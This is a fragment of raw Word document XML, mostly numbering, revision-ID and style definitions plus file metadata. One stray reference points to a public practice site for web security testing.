    <w:tmpl w:val="FF340B3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422308E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDFAF0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2FC5761"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3BAA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BB73755"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76AC0286"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">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nsid w:val="634C272A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49908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15B03F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBC05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748603F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FA8BDF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0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="6"/>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savePreviewPicture/>
  <w:compat/>
  <w:rsids>
    <w:rsidRoot w:val="007E679C"/>
    <w:rsid w:val="00242F2F"/>
    <w:rsid w:val="003F5C77"/>
    <w:rsid w:val="00444CCB"/>
    <w:rsid w:val="004B100A"/>
    <w:rsid w:val="00565052"/>
    <w:rsid w:val="007E679C"/>
    <w:rsid w:val="00802D08"/>
    <w:rsid w:val="00821185"/>
    <w:rsid w:val="00834CA8"/>
    <w:rsid w:val="009E31EB"/>
    <w:rsid w:val="00A55ECD"/>
    <w:rsid w:val="00AE5BA1"/>
    <w:rsid w:val="00AF37D4"/>
    <w:rsid w:val="00AF696A"/>
    <w:rsid w:val="00BC659F"/>
    <w:rsid w:val="00CF5C36"/>
    <w:rsid w:val="00D61239"/>
    <w:rsid w:val="00E211DB"/>
    <w:rsid w:val="00EC296D"/>
    <w:rsid w:val="00F022CA"/>
    <w:rsid w:val="00FE0D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11D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5ECD"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A55ECD"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A55ECD"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC65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659F"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC659F"/>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2123105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testphp.vulnweb.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8</Pages>
  <Words>1031</Words>
  <Characters>5877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Azeez saginala</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>chaitanya sai</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-25T15:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-09T16:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>